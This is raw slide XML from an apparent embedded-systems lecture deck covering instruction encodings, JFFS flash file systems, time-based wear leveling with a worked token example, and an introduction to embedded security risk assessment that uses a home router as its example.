        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3352800"/>
            <a:ext cx="744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i="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16426" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3694113" y="3773488"/>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27" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440113" y="4206875"/>
            <a:ext cx="1065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Add/Sub/Shift</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16428" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3430588" y="4635500"/>
            <a:ext cx="1082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Add/Min/Cmp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16429" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3279775" y="5056188"/>
            <a:ext cx="138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General/Single Ops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16430" name="Text Box 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="20113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1" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="2444750"/>
            <a:ext cx="554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2" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="2892425"/>
            <a:ext cx="554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3" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="3335338"/>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4" name="Text Box 50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5456238" y="3773488"/>
            <a:ext cx="565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5" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5456238" y="4206875"/>
            <a:ext cx="565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6" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5456238" y="4635500"/>
            <a:ext cx="565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7" name="Text Box 53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5102225" y="5056188"/>
            <a:ext cx="1273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Shift/Sub/Bit Ops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16438" name="Text Box 54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6775450" y="2009775"/>
            <a:ext cx="13890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Stack Pointer based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16439" name="Text Box 55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6737350" y="2446338"/>
            <a:ext cx="1465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Global Pointer based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16440" name="Text Box 56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091363" y="2892425"/>
            <a:ext cx="7556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PC based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16441" name="Text Box 57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7234238" y="3335338"/>
            <a:ext cx="4714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Mov</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16442" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7246938" y="3775075"/>
            <a:ext cx="446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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16443" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7092950" y="4205288"/>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4" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7092950" y="5056188"/>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5" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7092950" y="46355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6" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3079750" y="2435225"/>
            <a:ext cx="17859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47" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="2895600"/>
            <a:ext cx="744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i="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Times"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35984630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6640"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7171" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2484438" y="6237288"/>
            <a:ext cx="4906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a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172"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4755D382-3836-4340-A03E-EFDF2394F896}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>320</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1650263642"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:fad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7664"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8195" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2484438" y="6237288"/>
            <a:ext cx="4906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8196"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9A76C842-7816-480C-A347-ACA1E52D8294}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>321</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191190954"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:fad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p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1481138" y="304800"/>
          <a:ext cx="6254750" cy="5867400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s28688" name="Visio" r:id="rId3" imgW="7362063" imgH="6904977" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="7362063"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4750" cy="5867400"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2484438" y="6237288"/>
            <a:ext cx="460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9220"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1654EC13-03B3-4BFD-A2AC-1519E4DDC6DA}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>322</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1701341739"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:fad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JFFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Journaling Flash File System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed in Linux to support flash devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Log-based file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JFFS2 supports NAND flash devices (JFFS supported NOR only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JFFS2 also implements compression and improves performance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249874253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lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In some cases, the designer needs to ensure overall lifetime of device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent hacker or uninformed user from taking the system out of use by wearing out the flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash access needs to be leveled in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reject writes to flash if they are “too frequent”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4041541084"/>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err="1" smtClean="0"/>
              <a:t>Bnow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = number of bytes (“tokens”) allowed to write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>B0 – initial tokens to allow the system to get going</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>L = device lifetime, by design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>S = flash size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T = time elapsed since device manufacturing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>B = number of bytes written since manufacturing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assuming complete wear-leveling:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Bnow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = B0 – B + T * (100,000*S / L)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2615297834"/>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normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>L = 10 years = 3650 days = 87,600 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>S = 1MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Average write rate = (100,000 * S / L) = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>100,000MB / 87,600hr = 1.14 MB/hr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>B0 = 1MB, initial tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T = 364 days  + 23.5 hrs = 8,759.5 hrs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>B = 10GB written so far = 10,000 MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Bnow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>B0 – B + T * (100,000*S / L) = 1MB – 10GB + 8,759.5 * 1.14 = 430KB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writing a 600KB file be rejected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will be allowed within a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>few minutes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3525319763"/>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Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84303912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Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>General security principles apply just the same to embedded system design and implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security requirements varies depending on use of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What are the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>attack surfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which attacks do we want to protect from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6044332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TVC methodology</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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>security risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of an attack is a factor of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Consequence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyze the risk of all attacks on the system (risk assessment)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address the high-risk issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44727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457200" y="2209800"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276428088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Example: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Home Router</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1901825"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect against unauthorized access over the network – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Local LAN, Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect against Denial of Service Attacks from Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t care for local LAN and </a:t>
            </a:r>
            <a:r>
